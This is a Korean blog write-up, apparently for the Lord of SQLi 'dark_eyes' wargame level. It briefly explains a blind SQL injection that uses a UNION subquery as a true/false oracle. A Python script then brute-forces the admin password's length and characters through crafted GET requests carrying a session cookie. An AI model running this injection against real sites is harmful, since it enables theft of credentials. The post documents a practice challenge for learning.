이 문제는 if문이 막혀있었다.

그래서 검색을 해보니 union으로 거짓일 경우와 참일 경우를 비교하는 방법을 찾아냈다.



이것을 이용해서 이전 문제와 비슷하게 풀어냈다.


import requests



url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"

headers = {'User-Agent': 'Mozilla/5.0'}

cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}


'''

?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20length(pw)=8%20union%20select%201)--%20-

'''


length = 0


for i in range(1,100):

    rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20length(pw)=" + str(i) + "%20union%20select%201)--%20-", headers=headers, cookies=cookies)

    text = rs.text


    if("query" in text):

        print("find it length = " + str(i))

        length = i

        break



# get length


for i in range(1, length+1):

    for c in range(33, 255):

        rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20ord(substr(pw, " + str(i) + ",1))="+ str(c) +"%20union%20select%201)--%20-", headers=headers, cookies=cookies)

        text = rs.text


        if("query" in text):

            print(str(i) + " find it " + str(c) + " " + chr(c))

            break

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[picoCTF] A Simple Question  (31) 2018.10.18
[LOS1] umaru  (0) 2018.09.27
[LOS1] iron_golem  (0) 2018.09.27
[LOS1] dragon  (0) 2018.09.22
[LOS1] xavis  (0) 2018.09.22

+ Recent posts